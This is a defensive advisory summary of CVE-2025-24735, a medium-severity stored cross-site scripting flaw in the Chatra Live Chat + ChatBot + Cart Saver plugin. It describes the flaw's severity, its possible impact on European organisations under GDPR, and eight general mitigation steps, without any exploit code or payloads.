CVE-2025-24735 is a medium-severity stored Cross-site Scripting (XSS) vulnerability affecting the Chatra Live Chat + ChatBot + Cart Saver product up to version 1.0.11. The vulnerability arises from improper neutralization of input during web page generation, classified under CWE-79. Specifically, the application fails to adequately sanitize or encode user-supplied input before rendering it in web pages, allowing attackers to inject malicious scripts that persist on the server and execute in the browsers of users who view the affected content. This stored XSS can lead to unauthorized actions performed in the context of the victim’s session, theft of sensitive information such as cookies or tokens, and potential pivoting to further attacks. The CVSS 3.1 score of 5.9 reflects a medium severity with network attack vector, low attack complexity, but requiring high privileges and user interaction. The scope is changed, indicating that the vulnerability can affect components beyond the initially vulnerable module. No known exploits are currently reported in the wild, and no patches have been linked yet. The vulnerability was reserved in January 2025 and published in July 2025. Given that Chatra Live Chat is a widely used customer engagement tool embedded in websites, exploitation could impact the confidentiality, integrity, and availability of user sessions and data on affected sites.

For European organizations, the impact of this stored XSS vulnerability can be significant, especially for e-commerce, customer service, and SaaS providers using Chatra Live Chat + ChatBot + Cart Saver. Exploitation could allow attackers to hijack user sessions, steal personal data, or manipulate user interactions, potentially violating GDPR requirements on data protection and user consent. This could lead to reputational damage, regulatory fines, and loss of customer trust. Additionally, attackers might leverage the vulnerability to distribute malware or conduct phishing campaigns targeting European users. The medium severity suggests that while exploitation requires some privileges and user interaction, the broad deployment of Chatra in European markets increases the attack surface. Organizations relying on Chatra for real-time customer engagement should be aware of the risk of persistent malicious scripts affecting their users and internal staff.

1. Immediate mitigation should include disabling or restricting user input fields in Chatra that accept untrusted data until a patch is available. 2. Implement strict Content Security Policy (CSP) headers to limit the execution of unauthorized scripts on pages embedding Chatra. 3. Employ web application firewalls (WAFs) with rules to detect and block typical XSS payloads targeting Chatra components. 4. Conduct thorough input validation and output encoding on all user-supplied data within Chatra interfaces, especially for chat messages and chatbot inputs. 5. Monitor logs for unusual script injection attempts or user behavior anomalies. 6. Once available, promptly apply vendor patches or updates addressing CVE-2025-24735. 7. Educate users and administrators about the risks of clicking on suspicious links or interacting with unexpected chat content. 8. Review and harden authentication and session management controls to minimize impact if an XSS attack occurs.